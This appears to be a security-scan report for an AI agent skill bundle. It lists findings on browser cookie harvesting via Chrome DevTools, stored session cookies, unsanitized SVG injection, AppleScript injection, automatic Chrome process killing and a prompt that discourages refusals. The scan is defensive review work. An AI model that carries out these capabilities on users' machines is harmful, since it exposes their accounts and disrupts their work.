ClawHub

Baoyu Skills

Security checks across malware telemetry and agentic risk

Overview

This broad content-automation bundle is mostly coherent, but it needs Review because some subskills can reuse browser sessions, store login cookies, automate account actions, and terminate browser debug processes.

Install only if you are comfortable granting a single skill bundle broad browser and account automation powers. Use dedicated Chrome profiles, avoid reusing your normal logged-in browser session, review and delete stored cookie/session files when done, and do not allow automatic browser-process killing around unsaved work. Treat the posting subskills as capable of changing real account state, including drafts or public posts.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
Findings (33)

Lp3

Medium
Category
MCP Least Privilege
Confidence
84% confidence
Finding
The skill metadata advertises installation and execution of Bun/Node-based scripts and describes capabilities that inherently use shell execution, environment variables, and network access, but it does not declare any permissions for those capabilities. This creates a transparency and policy-enforcement gap: users and any permission framework cannot accurately assess or constrain what the skill may access, which is especially relevant because several subskills fetch remote content or publish to external platforms.

Context-Inappropriate Capability

High
Confidence
98% confidence
Finding
When inlineSvg is enabled, the code fetches remote SVG text and injects it directly into the DOM via outerHTML without sanitization. SVG is active content and can contain script-capable elements, event handlers, foreignObject HTML, or external references, so a malicious or compromised PlantUML server—or attacker-controlled serverUrl—can trigger XSS in the rendering context.

Context-Inappropriate Capability

Medium
Confidence
98% confidence
Finding
The prompt explicitly tells the model to avoid refusal for sensitive or copyrighted figures and instead generate stylistically similar alternatives. That weakens normal safety boundaries around protected or sensitive depictions and introduces an unnecessary policy-bypass behavior for a simple article-illustration skill.

Context-Inappropriate Capability

Medium
Confidence
94% confidence
Finding
The preset hard-codes Doraemon characters as the default output style, which can cause the skill to generate copyrighted character depictions without the user explicitly requesting them. In a comic-generation context, this creates a foreseeable intellectual-property compliance risk because normal use of the preset will steer outputs toward protected characters by default.

Description-Behavior Mismatch

Medium
Confidence
95% confidence
Finding
This client does more than transient web fetching: it manages Google session cookies, refreshes them in the background, and persists updated credentials to disk. In a skill advertised as web scraping/fetching, this expands the trust boundary and increases the chance of credential misuse, account persistence, and unintended access to a user's Google session.

Context-Inappropriate Capability

Medium
Confidence
97% confidence
Finding
The code writes sensitive Google authentication cookies to a local file via write_cookie_file(...). Persisting live session cookies creates a credential theft target on disk; any local compromise, overly broad file permissions, logs, backups, or other skills/processes could reuse the cookies to impersonate the user.

Context-Inappropriate Capability

Medium
Confidence
94% confidence
Finding
The background auto-refresh task continuously rotates Google session cookies, helping maintain a long-lived authenticated session without fresh user action. That increases the blast radius of compromise because stolen cookies remain usable longer and the skill effectively sustains account access over time.

Description-Behavior Mismatch

High
Confidence
99% confidence
Finding
This code programmatically extracts Google/Gemini session cookies from Chrome via the DevTools Protocol and then persists them to disk with write_cookie_file. Those cookies can authenticate requests as the user, enabling account/session hijacking and unauthorized access to Gemini or related Google web sessions without normal credential entry.

Context-Inappropriate Capability

High
Confidence
99% confidence
Finding
The function discoverRunningChromeDebugPort plus fetch_cookies_from_existing_chrome attaches to arbitrary running Chrome debug sessions and harvests cookies for google.com/accounts/gemini URLs. Reusing an existing browser session in this way bypasses normal trust boundaries and can steal active authenticated sessions from a user or another process.

Description-Behavior Mismatch

Medium
Confidence
96% confidence
Finding
The script does substantially more than webpage fetching: it loads, stores, updates, and lists local chat sessions containing user and model message history. In an agent-skill context, hidden persistence expands data retention and exposure beyond user expectations, creating privacy and data-leak risk if sensitive prompts or outputs are later enumerated or accessed by other workflows.

Description-Behavior Mismatch

Medium
Confidence
94% confidence
Finding
The usage and option handling expose login, cookie refresh, and Chrome profile/debug-session reuse behavior that is not reflected in the skill's stated purpose of web fetching. In practice this can access or reuse authenticated browser state, broadening privileges and risking unintended account/session exposure when invoked by an agent or user who expects only content retrieval.

Context-Inappropriate Capability

Medium
Confidence
95% confidence
Finding
This code deliberately searches common Chrome user-data directories, reads DevToolsActivePort files, inspects process listings, and attaches to any locally running Chrome instance exposing the DevTools protocol. That creates a powerful ambient-authority boundary break: the skill can inherit an already-authenticated browser context, access pages, cookies, local session state, and interact with tabs the user did not explicitly open for the skill. In the context of a web-scraping skill, this is especially dangerous because it normalizes silent reuse of an existing browser session rather than launching an isolated profile.

Description-Behavior Mismatch

Medium
Confidence
84% confidence
Finding
The tool includes a browser-based login/cookie refresh workflow that is not reflected in the declared X-to-Markdown conversion purpose. In an agent skill context, undisclosed authentication flows are risky because they can cause users to grant access to account session data and enable authenticated scraping beyond what a simple converter would reasonably require.

Context-Inappropriate Capability

Medium
Confidence
89% confidence
Finding
The script persists a consent record and, by design of the surrounding workflow, relies on stored authenticated cookie state for later use. In a content-conversion skill, local persistence of account-related state increases the attack surface: other local processes or later runs may reuse that state, and users may not understand that a one-time conversion created durable sensitive artifacts.

Description-Behavior Mismatch

Medium
Confidence
90% confidence
Finding
This code can discover an already-running local Chrome instance via DevToolsActivePort or process inspection, then connect to its CDP websocket and create or attach to tabs. That goes well beyond a narrow X-post-to-Markdown workflow and can grant access to the user's authenticated browser context, page contents, cookies/session-backed actions, and other sensitive local browsing state if the surrounding skill invokes it.

Context-Inappropriate Capability

Medium
Confidence
86% confidence
Finding
The module enumerates host Chrome profile locations and inspects the local process list to locate debugging ports. For a Markdown conversion skill, this is an unnecessary host reconnaissance capability that can be used to discover and later access browser sessions outside the user's intended task, increasing privacy and account-compromise risk.

Context-Inappropriate Capability

Medium
Confidence
84% confidence
Finding
The skill instructs the agent to invoke external tooling via `bun` or `npx -y bun`, which expands the trusted computing boundary and can introduce supply-chain and execution risks. In particular, falling back to `npx` may fetch and execute packages at runtime, and processing attacker-controlled files through external scripts can expose the environment to unsafe code paths or unexpected script behavior.

Context-Inappropriate Capability

Medium
Confidence
96% confidence
Finding
This code fetches SVG content from an external PlantUML server and injects the returned text directly into the DOM via outerHTML without sanitization. If the PlantUML server, the network path, or serverUrl configuration is compromised, attacker-controlled SVG/HTML can execute script or abuse SVG event handlers, causing XSS in the rendering context and also exfiltrating sensitive diagram contents to a third-party service.

Intent-Code Divergence

Medium
Confidence
96% confidence
Finding
The CLI advertises `--submit` as controlling whether the article is saved as a draft, but `postArticle()` unconditionally clicks `#js_submit button` and saves anyway. In an automation skill that posts to a real WeChat Official Account, this can cause unintended publication workflow actions, account-side state changes, and accidental draft creation even when the caller expected a dry run or content preparation only.

Context-Inappropriate Capability

Medium
Confidence
94% confidence
Finding
The skill instructs the agent to automatically run `pkill -f` against Chrome/Chromium processes when troubleshooting CDP connectivity. That expands the skill from posting to Weibo into host process management and can terminate unrelated browser sessions, causing denial of service, user disruption, and possible data loss in open tabs or unsaved work. In this context, the capability is not necessary to compose a post and is especially risky because it is framed as an automatic recovery action without user confirmation.

Intent-Code Divergence

Medium
Confidence
87% confidence
Finding
The documentation creates a misleading safety boundary by stating the scripts only fill content for manual publishing, while nearby instructions authorize automatic termination of Chrome CDP instances. This inconsistency can cause an agent or user to underestimate the operational impact of the skill and permit destructive side effects beyond the stated purpose. Misrepresented capabilities are dangerous in agentic systems because they weaken informed consent and can bypass user expectations about what the skill may do on the local machine.

Context-Inappropriate Capability

Medium
Confidence
95% confidence
Finding
The macOS AppleScript embeds the user-supplied app name directly into a quoted script string without escaping. A crafted app name containing quotes or AppleScript syntax can break out of the string literal and inject arbitrary AppleScript commands, potentially controlling other applications or triggering unwanted local actions when osascript runs.

Intent-Code Divergence

Medium
Confidence
93% confidence
Finding
The skill claims posting requires user review and manual publication, yet separately instructs the agent to automatically kill Chrome/Chromium processes and retry without asking. That creates an undocumented side effect on the local system, violating user expectation and allowing the skill to disrupt unrelated browser sessions or other automation using the same debug flag.

Context-Inappropriate Capability

Medium
Confidence
96% confidence
Finding
The documented recovery command uses broad process-kill patterns against any local Chrome or Chromium instance with a remote debugging port. For a content-posting skill, that exceeds the minimum required capability and can terminate unrelated browser sessions, automation workflows, or work in progress, causing denial of service and possible data loss.

Context-Inappropriate Capability

Medium
Confidence
91% confidence
Finding
This script performs real OS-level keystroke injection into whichever app is frontmost, and on macOS can first activate an arbitrary named application before sending Cmd+V. That gives the skill the ability to drive unrelated desktop applications outside the browser/session boundary, which can cause unintended actions or paste sensitive clipboard contents into the wrong target if misused or invoked in the wrong context.

VirusTotal

VirusTotal findings are pending for this skill version.

View on VirusTotal